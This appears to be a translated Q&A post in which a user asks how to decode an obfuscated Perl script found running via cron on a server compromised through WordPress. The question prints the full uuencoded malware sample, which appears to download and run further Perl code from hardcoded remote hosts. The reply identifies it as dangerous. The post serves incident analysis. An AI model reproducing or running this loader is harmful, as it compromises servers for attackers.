linux - 解码 Perl 脚本

Question

谁能指导我如何解码下面的 perl 脚本。它是通过被黑的 WordPress 网站上传到服务器的脚本。它通过 cron 作业连续运行，我怀疑它是一个加密挖掘脚本。

my $INrVhi;$INrVhi.=$_ while(<DATA>);eval(unpack('u*',$INrVhi));
__DATA__
M(R$O=7-R+V)I;B]P97)L("UW"G5S92!S=')I8W0["G5S92!03U-)6#L*=7-E
M($E/.CI3;V-K970["G5S92!)3SHZ4V5L96-T.PHD,"`](")X:6YE=&0B.R!M
M>2`H)'$Q+"`D<3(I(#T@*"(P+C<B+"`B,"XX(BD[("1\(#T@,3L@)FUA:6XH
M*3L*<W5B(&UA:6X*>PIE>&ET(#`@=6YL97-S(&1E9FEN960@*&UY("1P:60@
M/2!F;W)K*3L*97AI="`P(&EF("1P:60["E!/4TE8.CIS971S:60H*3L*)%-)
M1WLD7WT@/2`B24=.3U)%(B!F;W(@*'%W("A(55`@24Y4($E,3"!&4$4@455)
M5"!!0E)4(%534C$@4T5'5B!54U(R(%!)4$4@04Q232!415)-($-(3$0I*3L*
M=6UA<VL@,#L*8VAD:7(@(B\B.PIO<&5N("A35$1)3BP@(CPO9&5V+VYU;&PB
M*3L*;W!E;B`H4U1$3U54+"`B/B]D978O;G5L;"(I.PIO<&5N("A35$1%4E(L
M("(^)E-41$]55"(I.PIM>2`D=7)L(#T@6R(U+C$S-2XT,BXY.#HR-2(L(C$Y
M."XR-#4N-#DN,3`V(ET["FUY("1R;F0@/2!;(F$B+BXB>B(L(")!(BXN(EHB
M73L@)')N9"`](&IO:6X@*"(B+"!`)')N9%MM87`@>W)A;F0@0"1R;F1]*#$N
M+B@V("L@:6YT(')A;F0@-2DI72D["FUY("1D:7(@/2`B+W9A<B]T;7`B.R!I
M9B`H;W!E;B`H1BP@(CXB+"`B+W1M<"\D<FYD(BDI('L@8VQO<V4@1CL@=6YL
M:6YK("(O=&UP+R1R;F0B.R`D9&ER(#TB+W1M<"([('T*;7D@*"1H96%D97(L
M("1C;VYT96YT*3L*;7D@*"1L:6YK+"`D9FEL92P@)&ED+"`D8V]M;6%N9"P@
M)'1I;65O=70I(#T@*")E;BYW:6MI<&5D:6$N;W)G(BP@(FEN9&5X+FAT;6PB
M+"`Q+"`Y-BP@,3`I.PIF;W)E86-H(&UY("1R<R`H0"1U<FPI"GL*)&AE861E
M<B`]("(D9&ER+R(@+B!T:6UE.R`D8V]N=&5N="`]("1H96%D97(@+B`B,2([
M"G5N;&EN:R`D:&5A9&5R(&EF("UF("1H96%D97([('5N;&EN:R`D8V]N=&5N
M="!I9B`M9B`D8V]N=&5N=#L*)FAT='`H)')S+"`D=&EM96]U="P@)&AE861E
M<BP@)&-O;G1E;G0L(#`I.PII9B`H;W!E;B`H1BP@(CPB+"`D:&5A9&5R*2D*
M>PIF;&]C:R!&+"`Q.PIM>2`H)'1E<W0L("1T87-K*2`]("@P+"`B(BD["G=H
M:6QE("@\1CXI"GL*<R]>7',J*%M>7'-=/RXJ*20O)#$O.PIS+UXH+BI;7EQS
M72E<<RHD+R0Q+SL*;F5X="!U;FQE<W,@;&5N9W1H("1?.PHD=&5S="`K*R!I
M9B`D7R!E<2`B2%144"\Q+C`@,C`P($]+(B!\?"`D7R!E<2`B0V]N;F5C=&EO
M;CH@8VQO<V4B.R`D=&%S:R`]("0Q(&EF("]>4V5T+4-O;VMI93H@4$A04T53
M4TE$/2A;7CM=*RDO.PI]"F-L;W-E($8["B@D;&EN:RP@)&9I;&4L("1I9"P@
M)&-O;6UA;F0L("1T:6UE;W5T*2`]("9D96-X9"@D=&%S:RD@:68@)'1E<W0@
M/3T@,B`F)B!L96YG=&@@)'1A<VL["GT*=6YL:6YK("1H96%D97(@:68@+68@
M)&AE861E<CL@=6YL:6YK("1C;VYT96YT(&EF("UF("1C;VYT96YT.PI]"F5X
M:70@,"!I9B`A9&5F:6YE9"`D8V]M;6%N9"!\?"`D8V]M;6%N9"`A?B`O7C$V
M)"\["B1H96%D97(@/2`B)&1I<B\B("X@=&EM93L@)&-O;G1E;G0@/2`B)&1I
M<B\D9FEL92(["G5N;&EN:R`D:&5A9&5R(&EF("UF("1H96%D97([('5N;&EN
M:R`D8V]N=&5N="!I9B`M9B`D8V]N=&5N=#L*)FAT='`H)&QI;FLL("1T:6UE
M;W5T+"`D:&5A9&5R+"`D8V]N=&5N="P@,2D["FUY("@D<F5S<"P@)'-I>F4I
M(#T@*"(P,#`B+"`P*3L*:68@*&]P96X@*$8L("(\(BP@)&AE861E<BDI"GL*
M9FQO8VL@1BP@,3L*=VAI;&4@*#Q&/BD*>PIS+UY<<RHH6UY<<UT_+BHI)"\D
M,2\["G,O7B@N*EM>7'-=*5QS*B0O)#$O.PIN97AT('5N;&5S<R!L96YG=&@@
M)%\["B1R97-P(#T@)#$@:68@+UY(5%107%,K7',K*%QD7&1<9"DO.PI]"F-L
M;W-E($8["GT*)'-I>F4@/2`H<W1A="`D8V]N=&5N="E;-UT@:68@+68@)&-O
M;G1E;G0["B1S:7IE(#T@,"!I9B`A9&5F:6YE9"`D<VEZ92!\?"`D<VEZ92`A
M?B`O7EQD*R0O.PII9B`H)'-I>F4@/B`P*0I["F-H;6]D(#`W-34L("1C;VYT
M96YT.PIS>7-T96T@(G!E<FP@)&-O;G1E;G0@/B]D978O;G5L;"`R/B8Q(CL*
M?0IU;FQI;FL@)&AE861E<B!I9B`M9B`D:&5A9&5R.R!U;FQI;FL@)&-O;G1E
M;G0@:68@+68@)&-O;G1E;G0["F9O<F5A8V@@;7D@)')S("A`)'5R;"D*>PHD
M:&5A9&5R(#T@(B]D978O;G5L;"([("1C;VYT96YT(#T@)&AE861E<CL*)FAT
M='`H)')S+"`Q,"P@)&AE861E<BP@)&-O;G1E;G0L(#`L("(D:60N)')E<W`N
M)'-I>F4B*3L*?0IE>&ET(#`["GT*<W5B('AO<FP*>PIM>2`H)&QI;F4L("1C
M;V1E+"`D>&]R+"`D;&EM*2`]("AS:&EF="P@(B(L(#$L(#$V*3L*9F]R96%C
M:"!M>2`D8VAR("AS<&QI="`H+R\L("1L:6YE*2D*>PII9B`H)'AO<B`]/2`D
M;&EM*0I["B1L:6T@/2`P(&EF("1L:6T@/3T@,C4V.PHD;&EM("L](#$V.PHD
M>&]R(#T@,3L*?0HD8V]D92`N/2!P86-K("@B0R(L('5N<&%C:R`H(D,B+"`D
M8VAR*2!>("1X;W(I.PHD>&]R("LK.PI]"G)E='5R;B`D8V]D93L*?0IS=6(@
M9&5C>&0*>PIM>2`D9&%T82`]('!A8VL@*")(*B(L('-H:69T*3L*0%\@/2!U
M;G!A8VL@*")#-2(L('-U8G-T<B`H)&1A=&$L(#`L(#4L("(B*2D["G)E='5R
M;B`H)GAO<FPH<W5B<W1R("@D9&%T82P@,"P@<VAI9G0L("(B*2DL("9X;W)L
M*'-U8G-T<B`H)&1A=&$L(#`L('-H:69T+"`B(BDI+"!`7RD["GT*<W5B(&AT
M='`*>PIM>2`H)'5R;"P@)'1I;65O=70L("1H96%D97(L("1C;VYT96YT+"`D
M;6]D92P@)&=E8VMO*2`]($!?.PHD9V5C:V\@/2`B,C`Q,#`Q,#$B(&EF("%D
M969I;F5D("1G96-K;R!\?"`A;&5N9W1H("1G96-K;SL*;7D@*"1H;W-T+"`D
M<&]R="P@)'!A=&@I(#T@)'5R;"`]?B`O7BA;7EPO.ETK*3HJ*%QD*BD_*%PO
M/UM>7"-=*BDO.PIR971U<FX@=6YL97-S("1H;W-T.PIM>2`D861D<B`](&=E
M=&AO<W1B>6YA;64@)&AO<W0["G)E='5R;B!U;FQE<W,@)&%D9'(["B1P;W)T
M('Q\/2`X,#L*)'!A=&@@?'P]("(O(CL*)&%D9'(@/2!S;V-K861D<E]I;B@D
M<&]R="P@)&%D9'(I.PIM>2`D<F5A9&5R<R`]($E/.CI396QE8W0M/FYE=R@I
M(&]R(')E='5R;CL*;7D@)'=R:71E<G,@/2!)3SHZ4V5L96-T+3YN97<H*2!O
M<B!R971U<FX["FUY("1B=69F97(@/2!J;VEN"B@*(EQX,$1<>#!!(BP*(D=%
M5"`D<&%T:"!(5%10+S$N,2(L"B)(;W-T.B`D:&]S="(L"B)5<V5R+4%G96YT
M.B!-;WII;&QA+S4N,"`H5VEN9&]W<R!.5"`V+C$[(%=I;C8T.R!X-C0[(')V
M.C8P+C`I($=E8VMO+R1G96-K;R!&:7)E9F]X+S8P+C`B+`HB06-C97!T.B!T
M97AT+VAT;6PL87!P;&EC871I;VXO>&AT;6PK>&UL+&%P<&QI8V%T:6]N+WAM
M;#MQ/21Q,2PJ+RH[<3TD<3(B+`HB06-C97!T+4QA;F=U86=E.B!E;BUU<RQE
M;CMQ/21Q,2(L"B)!8V-E<'0M16YC;V1I;F<Z(&=Z:7`L(&1E9FQA=&4B+`HB
M06-C97!T+4-H87)S970Z($E33RTX.#4Y+3$L=71F+3@[<3TD<3(L*CMQ/21Q
M,2(L"B)#;VYN96-T:6]N.B!C;&]S92(L"B)<>#!$7'@P02(**3L*:68@*"1M
M;V1E*0I["B1B=69F97(@/2!J;VEN"B@*(EQX,$1<>#!!(BP*(D=%5"`D<&%T
M:"!(5%10+S$N,"(L"B)(;W-T.B`D:&]S="(L"B)5<V5R+4%G96YT.B!-;WII
M;&QA+S4N,"`H5VEN9&]W<R!.5"`V+C$[(%=I;C8T.R!X-C0[(')V.C8Q+C`I
M($=E8VMO+R1G96-K;R!&:7)E9F]X+S8Q+C`B+`HB06-C97!T.B!T97AT+VAT
M;6PL*B\J(BP*(D-O;FYE8W1I;VXZ(&-L;W-E(BP*(EQX,$1<>#!!(@HI.PI]
M"FUY("1S;V-K970@/2!)3SHZ4V]C:V5T.CI)3D54+3YN97<H4')O=&\@/3X@
M(G1C<"(L(%1Y<&4@/3X@4T]#2U]35%)%04TI.PIR971U<FX@=6YL97-S("1S
M;V-K970["B1S;V-K970M/F)L;V-K:6YG*#`I.PIU;FQE<W,@*"1S;V-K970M
M/F-O;FYE8W0H)&%D9'(I*0I["G5N;&5S<R`H)"$@/3T@4$]325@Z.D5)3E!2
M3T=215-3*0I["F-L;W-E("1S;V-K970["G)E='5R;CL*?0I]"B1W<FET97)S
M+3YA9&0H)'-O8VME="D["B1T:6UE;W5T("L]('1I;64["FUY("1S=&5P(#T@
M,#L*=VAI;&4@*#$I"GL*24\Z.E-E;&5C="T^<V5L96-T*'5N9&5F+"!U;F1E
M9BP@=6YD968L(#`N,#(I.PIM>2`D=W)I=&%B;&4@/2`H24\Z.E-E;&5C="T^
M<V5L96-T*'5N9&5F+"`D=W)I=&5R<RP@=6YD968L(#`I*5LQ73L*9F]R96%C
M:"!M>2`D:&%N9&QE("A`)'=R:71A8FQE*0I["FEF("@D<W1E<"`]/2`P*0I[
M"B1S=&5P(#T@,2!I9B`D:&%N9&QE+3YC;VYN96-T960["GT*:68@*"1S=&5P
M(#T](#$I"GL*;7D@)')E<W5L="`]('-Y<W=R:71E("@D:&%N9&QE+"`D8G5F
M9F5R*3L*:68@*&1E9FEN960@)')E<W5L="`F)B`D<F5S=6QT(#X@,"D*>PIS
M=6)S='(@*"1B=69F97(L(#`L("1R97-U;'0I(#T@(B(["FEF("@A;&5N9W1H
M("1B=69F97(I"GL*)')E861E<G,M/F%D9"@D:&%N9&QE*3L*)'=R:71E<G,M
M/G)E;6]V92@D:&%N9&QE*3L*)'-T97`@/2`R.PI]"GT*96QS:68@*"0A(#T]
M(%!/4TE8.CI%5T]53$1"3$]#2RD*>PIN97AT.PI]"F5L<V4*>PHD=&EM96]U
M="`](#`["GT*?0I]"FUY("1R96%D86)L92`]("A)3SHZ4V5L96-T+3YS96QE
M8W0H)')E861E<G,L('5N9&5F+"!U;F1E9BP@,"DI6S!=.PIF;W)E86-H(&UY
M("1H86YD;&4@*$`D<F5A9&%B;&4I"GL*;F5X="!I9B`D<W1E<"`\(#(["FUY
M("1R97-U;'0["FEF("@D<W1E<"`]/2`R*0I["B1R97-U;'0@/2!S>7-R96%D
M("@D:&%N9&QE+"`D8G5F9F5R+"`X,3DR+"!L96YG=&@@)&)U9F9E<BD["GT*
M96QS90I["B1R97-U;'0@/2!S>7-R96%D("@D:&%N9&QE+"`D8G5F9F5R+"`X
M,3DR*3L*?0II9B`H,38S.#0@/"!L96YG=&@@)&)U9F9E<BD*>PHD=&EM96]U
M="`](#`["GT*96QS:68@*&1E9FEN960@)')E<W5L="D*>PII9B`H)')E<W5L
M="`^(#`I"GL*:68@*"1S=&5P(#T](#(I"GL*;7D@)&]F9G-E="`](&EN9&5X
M("@D8G5F9F5R+"`B7'@P1%QX,$%<>#!$7'@P02(I.PIN97AT(&EF("1O9F9S
M970@/"`P.PII9B`H;W!E;B`H1BP@(CX^(BP@)&AE861E<BDI"GL*9FQO8VL@
M1BP@,CL*8FEN;6]D92!&.PIP<FEN="!&('-U8G-T<B`H)&)U9F9E<BP@,"P@
M)&]F9G-E="D["F-L;W-E($8["GT*<W5B<W1R("@D8G5F9F5R+"`P+"`D;V9F
M<V5T("L@-"D@/2`B(CL*)'-T97`@/2`S.PI]"FEF("@D<W1E<"`]/2`S*0I[
M"FEF("AL96YG=&@@)&)U9F9E<BD*>PII9B`H;W!E;B`H1BP@(CX^(BP@)&-O
M;G1E;G0I*0I["F9L;V-K($8L(#(["F)I;FUO9&4@1CL*<')I;G0@1B`D8G5F
M9F5R.PIC;&]S92!&.PI]"B1B=69F97(@/2`B(CL*?0I]"FYE>'0["GT*)'1I
M;65O=70@/2`P.PI]"F5L<VEF("@D(2`]/2!03U-)6#HZ15=/54Q$0DQ/0TLI
M"GL*;F5X=#L*?0IE;'-E"GL*)'1I;65O=70@/2`P.PI]"GT*:68@*"1T:6UE
M;W5T(#P@=&EM92D*>PIF;W)E86-H(&UY("1H86YD;&4@*"1W<FET97)S+3YH
M86YD;&5S+"`D<F5A9&5R<RT^:&%N9&QE<RD*>PHD=W)I=&5R<RT^<F5M;W9E
M*"1H86YD;&4I(&EF("1W<FET97)S+3YE>&ES=',H)&AA;F1L92D["B1R96%D
M97)S+3YR96UO=F4H)&AA;F1L92D@:68@)')E861E<G,M/F5X:7-T<R@D:&%N
E9&QE*3L*8VQO<V4@)&AA;F1L93L*?0IR971U<FX["GT*?0I]"@``

Answer 1

这个东西看起来很危险，它从 5.135.42.98:25 或 198.245.49.106 下载更多 Perl 代码并执行该代码；正如 haukex 所说，摆脱它